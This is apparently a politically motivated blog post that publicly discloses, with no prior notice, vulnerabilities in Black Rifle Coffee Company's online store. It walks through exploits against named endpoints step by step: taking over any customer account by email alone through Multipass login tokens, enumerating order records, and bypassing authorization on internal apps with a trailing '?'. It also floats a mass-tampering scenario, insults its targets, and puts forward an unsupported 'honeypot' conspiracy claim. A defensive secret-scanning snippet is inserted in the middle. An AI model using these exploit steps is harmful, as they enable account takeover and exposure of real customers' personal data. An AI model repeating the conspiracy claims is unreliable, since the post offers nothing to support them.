Black Rifle Coffee Company: Zero Ethics, Zero Security

Posted in Current Events Rants.


11/29 Update from Security Researcher:

Please note that at no point in time did anyone at FMShooter steal, sell, hack, or otherwise use BRCC customer data.

The exploits listed in this blog post have existed for years (the Shopify admin keys are in mobile app versions dating back to 2018), so your data was likely compromised by someone else in that time frame.

All FMShooter has done is test their validity and report on them, causing them to be patched, meaning the exploits no longer work.

Black Rifle Coffee Company and Evan Hafer, embarrassed and angry, have decided to label us as “cyber criminals,” a dangerous precedent to set for non-fake-news security researchers reporting on exploits that have fueled real cyber criminals to DOX and harass you (BRCC’s customers) for YEARS.

Who would have thought grifters would have no sense of personal responsibility? Shame on Evan Hafer, and shame on the Black Rifle Coffee Company.


Let’s start with the big reveal: if you have ever had an account with Black Rifle Coffee Company, or have ever placed an order with them, your personal information is at risk. This does NOT include passwords or payment data (to my knowledge).

The Black Rifle Coffee Company is once again getting headlines over its treatment of Kyle Rittenhouse, the 17-year-old hero who shot two criminals (one of whom was a serial child rapist) dead and took a bicep off another. BRCC’s CEO, Evan Hafer, liked a Tweet calling Rittenhouse a “LARPer,” a “punk ass,” and “a wannabe douchebag.” He called those protecting their private property from rioters “repugnant.” He has also been caught donating to Act Blue, and Barack Obama:

Whenever a company pulls something like this, I like to take a quick look at their network infrastructure and security, in hopes that I get to write a blog post embarrassing them. As a summary, in case you don’t want to read the entire in-depth analysis of their network:

  • All BRCC customer data is available for anyone to access, excluding passwords (handled by Shopify) and payment data (handled by Stripe)
  • You can login as any BRCC customer without their password. You can edit profiles, place orders, and edit subscriptions just by knowing their email.
  • You can brute force customer emails using an internal API for looking up orders. This also includes (partial) payment data, tracking numbers, and more identifiers
  • You are able to see every time an employee discount is used, without logging in.
  • You could fuck with their custom Shopify integrations, but this probably won’t do much
  • Other unexplored discoveries include:
    • Other internal BRCC tools (*.apps.blackriflecoffee.com)
    • A potential querying endpoint: https://data.blackriflecoffee.com/
    • A potential querying endpoint: https://apps.customers.blackriflecoffee.com/
    • B2B sales platform: https://dealer.blackriflecoffee.com

Usually, these would be reported through HackerOne, or another kind of bug bounty program. Such a program would report the exploit to the company directly so they could fix it before a blog post about it is published, and would award a cash prize to whoever found the bug. However, as BRCC didn’t give Kyle a chance for his case to be heard before damning him, we, in turn, are forgoing the cash prize and not waiting to divulge this exploit. Call it karma.

A Warning

🛑 Do not perform these steps yourself unless you are well-versed in keeping your online identity secure. These are provided for security researchers to verify and explore, and are for educational purposes only. These tutorials assume basic knowledge of application development. For anyone else, just look at the pictures.

A Prerequisite

🛑 Do not use information retrieved via the exploits to steal BRCC’s customer data. Their customers are not at fault here. Limit your exploration to [email protected], or, if necessary, an unused @blackriflecoffee.com account.

The Goldmine

I took a look into the BRCC mobile application, not expecting to find anything. To my surprise, they embedded their Shopify admin keys inside their public mobile application, so if you have the mobile app installed, admin access to Black Rifle Coffee exists on your device.

These keys cannot be used to edit their customer-facing website, unfortunately, but they can be used to create/edit/delete orders, subscriptions, and customers. Also note that the Stripe keys here are not sensitive and are usually included in frontend applications; they are the exception. I redacted the ReCharge keys, as too much of them was exposed in the screenshot.

Also embedded are keys to their subscription platform, RechargeApps, an old (?) notification platform, Shopistry, and a custom application for push notifications, located at https://black-rifle-coffee.herokuapp.com. Each of these requires more investigation.
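The release gate BRCC evidently lacked, as an added example (not BRCC’s code and not from this post): a check that scans a mobile bundle’s baked-in config for secret-bearing credentials while letting publishable client keys through, the same distinction drawn above between the Shopify admin keys and the Stripe keys. The sample bundle text is constructed; the `shpat_`/`shpss_` and `sk_`/`pk_` prefixes are current Shopify and Stripe conventions (an assumption for older keys, which is why the name-based rule also exists, since the update notes keys dating back to 2018).

```javascript
// Values designed to live in a client; they must not block a release.
const PUBLISHABLE = [/^pk_(live|test)_[0-9A-Za-z]+$/]; // Stripe publishable keys

// Prefix-based detectors for credentials that are secret by construction.
const KNOWN_SECRETS = [
  { name: "Stripe secret key", re: /\bsk_(live|test)_[0-9A-Za-z]{8,}\b/ },
  { name: "Shopify Admin API access token", re: /\bshpat_[0-9a-f]{32}\b/ },
  { name: "Shopify app shared secret", re: /\bshpss_[0-9a-f]{32}\b/ },
];
// Name-based detector: a privileged-sounding config key assigned a non-trivial literal.
const PRIVILEGED_NAME = /["']?([A-Za-z0-9_]*(ADMIN|SECRET|PRIVATE|PASSWORD|TOKEN|API_KEY)[A-Za-z0-9_]*)["']?\s*[:=]\s*["']([^"']{8,})["']/i;

// Returns one finding per offending line: { line, name, key }.
function scanBundle(text) {
  const findings = [];
  text.split(/\r?\n/).forEach((raw, idx) => {
    const line = raw.trim();
    if (!line || line.startsWith("//") || line.startsWith("#")) return;
    for (const { name, re } of KNOWN_SECRETS) {
      if (re.test(line)) { findings.push({ line: idx + 1, name, key: null }); return; }
    }
    const m = PRIVILEGED_NAME.exec(line);
    if (m && !PUBLISHABLE.some((p) => p.test(m[3]))) {
      findings.push({ line: idx + 1, name: "privileged-looking config key", key: m[1] });
    }
  });
  return findings;
}

// Constructed sample config of the kind a build script bakes into an app bundle.
const SAMPLE_BUNDLE = `
// app-config.js (constructed sample)
STRIPE_PUBLISHABLE_KEY = "pk_live_CONSTRUCTED0000000000000"
SHOPIFY_STORE_DOMAIN = "example-store.myshopify.com"
SHOPIFY_ADMIN_TOKEN = "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"
RECHARGE_API_TOKEN = "constructed-recharge-token-value"
PUSH_ENDPOINT = "https://push.example.invalid/send"
`;

// Build gate: any finding fails the release.
function releaseAllowed(text) {
  return scanBundle(text).length === 0;
}
```

Run against the sample, the gate flags the Shopify admin token and the ReCharge token and passes the Stripe publishable key, which is exactly the split the screenshot discussion makes.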


The Exploits

1. Login as Any Customer

This one is so easy to perform that it is incredible it has not been found before.

  1. Send a POST request to https://account.blackriflecoffee.com/login with a JSON body consisting of `{"email": "[email protected]"}`
  2. You will receive a URL as a response.
    1. (optional) This URL contains a Shopify Multipass token; exchange that multipass token for a regular Shopify access token using the Shopify REST API.
    2. (optional) On account.blackriflecoffee.com, set your `shopify_customerToken` cookie to the regular Shopify access token. You now have access to any user’s account.blackriflecoffee.com account.
  3. Click the URL.
  4. You will now be in a hidden internal BRCC tool with the user’s profile pulled up. You can make any edits you would like.

From here, you can edit profiles, place orders, edit subscriptions, edit addresses. Free coffee, I guess? Their coffee is kinda shit though, so this is mostly for fun.

2. See Detailed Customer Data

  • Send a GET request to one of the following, replacing the email in the URL with any BRCC customer:

3. See Detailed Order Data

  • Send a GET request to https://account.blackriflecoffee.com/api/order/2760367571053. It may take a few tries to generate valid order IDs, but you can write a program to do this automatically.

4. Get a Bunch of Valid Order IDs

For some context, there are a bunch of internal tools BRCC uses to communicate between Shopify and their own systems. One such tool is located at https://apps.empdiscount.blackriflecoffee.com/. Note that this might give you an “Unauthorized” error, but you can quickly get around that by adding a `?` to the URL to fake a query parameter. So https://apps.empdiscount.blackriflecoffee.com/?. Lol.

Here you can get the details of anyone who has ever used an employee discount code. It’s in a UI so no instructions needed.

5. Fuck Around

There are a bunch of other internal apps like the employee discount one. They don’t do anything special, but I’m sure it breaks something, somewhere:

  • https://apps.inventory.blackriflecoffee.com/?
  • https://apps.ghfulfillment.blackriflecoffee.com/?
  • https://apps.fulfillment.blackriflecoffee.com/?
  • https://apps.stickerclub.blackriflecoffee.com/?

There are others, but there isn’t a traditional UI attached to them, so they will need further investigation by others who have time on their hands.

Conclusion

Seems to me that Evan Hafer and the rest of BRCC should spend less time attacking minors on Twitter, and more time ensuring their customers are safe while shopping for their sub-par coffee.

Personally, I prefer https://stockingmillcoffee.com/ (https://twitter.com/smcroasters)

If you’re a security researcher who has found something else related to BRCC, feel free to reach out, and we’ll update this article and credit appropriately.


Editor’s Note from FMShooter

Black Rifle Coffee Company should be extremely thankful that the author has the goodness in his heart not to abuse their very visible exploits in their website and payments processing, instead choosing to publicly share his findings via a blog post. A worse human being would have extracted all possible data and sold it to the highest bidder. A slightly less worse human being would have changed every customer’s name before mass placing orders to all of them indicating their true feelings for BRCC and Evan Hafer, this example being sent only to the test account mentioned above:

If BRCC had just spent less time and money commenting on politically charged court cases and contributing to political super PACs, they may have had the resources to develop a customer-facing website that wasn’t a complete security-riddled piece of shit, and the author would never have been able to write this post at all.

This blog may not have much reach, but if Hafer or any BRCC employees ever get a chance to view this post, they should take it as a humbling experience and a learning lesson to not piss all over your customer base. More likely, he will cry like a pansy, and blame “the Drumpftards” for daring to take a cursory look at his disdain for not only his customers, but his customer security.


11/25 Update from FMShooter

Black Rifle Coffee Company sent out a mass email to all of their customers following the publishing of our article:

Black Rifle Coffee is a company founded and led by veterans, with a mission of serving premium coffee to those who love America, so that we can give back to and support our vets and their families. Since founding in 2014, we’ve built a large community of people who, like you, support this mission. Unfortunately, there are those out there who don’t. We have learned that an individual is claiming to have exploited a vulnerability to gain access to the ecommerce platform used by Black Rifle Coffee. As soon as we learned of this issue, we immediately launched an investigation and moved swiftly to notify law enforcement. We also immediately implemented new security measures to further protect the platform.

There is no indication that any of our customers’ passwords or payment information was compromised. We will continue investigating and will provide an update if that changes. Sadly, un-American attacks like these are common, and we stand ready to support law enforcement’s continued efforts against cyber criminals. Please know that we care deeply about your privacy, and that we prioritize the safety, security, and privacy of your shopping experience. We will not be deterred in our mission to serve our fellow military service members, veterans, and patriots. We appreciate your support, and we wish you a fantastic Thanksgiving week.

Black Rifle Coffee Company

Well, it appears we did get BRCC’s attention with this post. And they have responded as expected; crying like pansies and referring to us as “un-American” (how they view “the Drumpftards” anyway).

News flash, dickheads – maybe if you weren’t such un-American pricks to your customer base and spent that time shoring up your security, no one would have even been able to investigate the website. 

We’ll still respond to a few of their points:

As soon as we learned of this issue, we immediately launched an investigation and moved swiftly to notify law enforcement.

Funny, no one at BRCC ever bothered to notify us. And it’s not like we’re hard to find. Oh, and neither did law enforcement. Maybe that’s because we broke precisely zero laws in publishing a blog post containing public information about BRCC’s godawful website security?

We also immediately implemented new security measures to further protect the platform.

Yes, BRCC most certainly did implement new security measures – they revoked permissions for the Shopify admin keys, which apparently causes their entire mobile app to crash, and disabled all their internal apps. If their idea of “new security measures” involves nuking their mobile app and internal apps, they should consider hiring all-new development and security teams.

There is no indication that any of our customers’ passwords or payment information was compromised.

Well no shit, Sherlock – the article stated that passwords and payment info were handled by Shopify and Stripe respectively, who at least seem to care about security. The only problem with BRCC’s lack of disclosure is that all other customer information has been publicly available for quite some time now. Funny that BRCC decided to leave that out of their email – especially considering the fact that their customer base, including many current and former military and LEO members, is uber-paranoid about their own personal information and security.

Sadly, un-American attacks like these are common, and we stand ready to support law enforcement’s continued efforts against cyber criminals.

Sadly, un-American piece of shit coffee companies like BRCC are common, and we stand ready to support law enforcement’s continued efforts to boycott and punish BRCC financially for their customer abuse and mistreatment.

Please know that we care deeply about your privacy, and that we prioritize the safety, security, and privacy of your shopping experience.

While we never like to chalk up to malice what can be attributed to incompetence – before publishing this article, we did consider that perhaps BRCC was a honeypot fed-trap operation all along, designed purposefully to expose their customer information to malicious actors for easy access. Given the leftist/globalist leanings of BRCC, and their disdain for their own customers, we can’t discount the possibility that the BRCC staff set up the company for the deliberate purpose of outing their customers. We’ll leave it to others more savvy or in-the-know than us to publish the truth on the BRCC malice/incompetence question.


Since Hafer never bothered to reach out to us, choosing instead to send an email blast to his full customer list, we feel confident in our assessment that he deserved his rekage. We are ready to cooperate with law enforcement should they reach out, though as indicated above, we are not expecting to hear anything but crickets.